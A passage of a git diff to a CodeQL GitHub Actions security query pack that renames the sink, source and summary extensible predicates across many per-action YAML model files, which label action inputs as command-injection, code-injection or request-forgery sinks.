b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml index 65965daeb1d..aa849603836 100644 --- a/ql/lib/ext/magefile_mage-action.model.yml +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml index ba9a04f588b..ae869b6b531 100644 --- a/ql/lib/ext/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml index aea054e24b0..9f5801b79c0 100644 --- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index c8646cffe8e..a4a473b8efd 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index bb1c3ffca2a..10a03e4d186 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml index d3bec5ea39d..9af82b985f3 100644 --- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index c65527150b5..3b779d0b86d 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml index 25565b445fc..6ad087730e4 100644 --- a/ql/lib/ext/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index d46a07dde96..fa9c1958352 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml index 2d162fbc914..6bfaffb2bba 100644 --- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"] diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml index fc91bacdb72..03fa8beaf0b 100644 --- a/ql/lib/ext/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml index 8b2b4e79afa..a4ccaac2d2e 100644 --- a/ql/lib/ext/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 2ea1fdf6855..7c32705dde5 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml index 21e0d819db7..902483f4399 100644 --- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml index bcc8ce6b80d..be86a330b97 100644 --- a/ql/lib/ext/nanasess_setup-php.model.yml +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml index 741ab37eb9b..0a6f7c34722 100644 --- a/ql/lib/ext/nick-fields_retry.model.yml +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml index a9d6b80a627..613b3e0fc59 100644 --- a/ql/lib/ext/octokit_graphql-action.model.yml +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml index 73d4df99af2..489d47ac71e 100644 --- a/ql/lib/ext/octokit_request-action.model.yml +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml index fb6ae5102e1..4a98ecd4af1 100644 --- a/ql/lib/ext/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml index 8b29e5c9988..57dc40ef6b8 100644 --- a/ql/lib/ext/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml index 5a5cedcaca5..3b92f667ae9 100644 --- a/ql/lib/ext/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml index d156d7da658..da8b02312ea 100644 --- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml index 12d3f23f8fd..c06d13301d2 100644 --- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml index 30be564c42a..61935c36f7d 100644 --- a/ql/lib/ext/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 13d4cfeb814..89f61cedc42 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 3043c9b30ec..1aabfc23fc4 100644 --- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index 29d51d1bfbb..d55fdbc3ea9 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index 75a9650a92f..d01ac86d317 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index a85a4b466e2..bab76cbe27f 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index a0c4d6f7ec5..02ac5032c79 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index b5d4629003b..0c484d44549 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index 4b96edeccc2..c088c7a644e 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index ae3ef2e2b1b..5b22ac1f5fe 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 079dfc1fc02..3329a255e6f 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 19edd617c67..14a1cdeed86 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml index 8ab1d090b1c..49931d93f88 100644 --- a/ql/lib/ext/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index 9f8d987c0af..37d0014bcbb 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 90a18103868..9058c9fb984 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index fd484074f5c..713c5c61cea 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml index 5caaea9562e..40b02283152 100644 --- a/ql/lib/ext/snow-actions_eclint.model.yml +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml index 9462b8d5bbd..c08505f9747 100644 --- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"] diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml index 9b01987e1f2..6305fd33960 100644 --- a/ql/lib/ext/step-security_harden-runner.model.yml +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 10a3630ea0b..73988096818 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml index aac20afddf5..ee9a0dbb32a 100644 --- a/ql/lib/ext/tibdex_backport.model.yml +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 8dcabd1650a..f056cf5d864 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index d98eda4e69f..838f0b30848 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index b8fb2514253..c215755f61d 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"] diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml index ae166b1f515..014e779b29a 100644 --- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"] diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index a6cc6884389..806c055529d 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index 499161aafcb..d6e554a8709 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index a352d6c9ff6..55d1531a770 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml index 6ed71f18215..c52d62e204a 100644 --- a/ql/lib/ext/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml index 5864c0d0ede..1e915194d96 100644 --- a/ql/lib/ext/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 173ecfc4222..1cc360c472d 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git 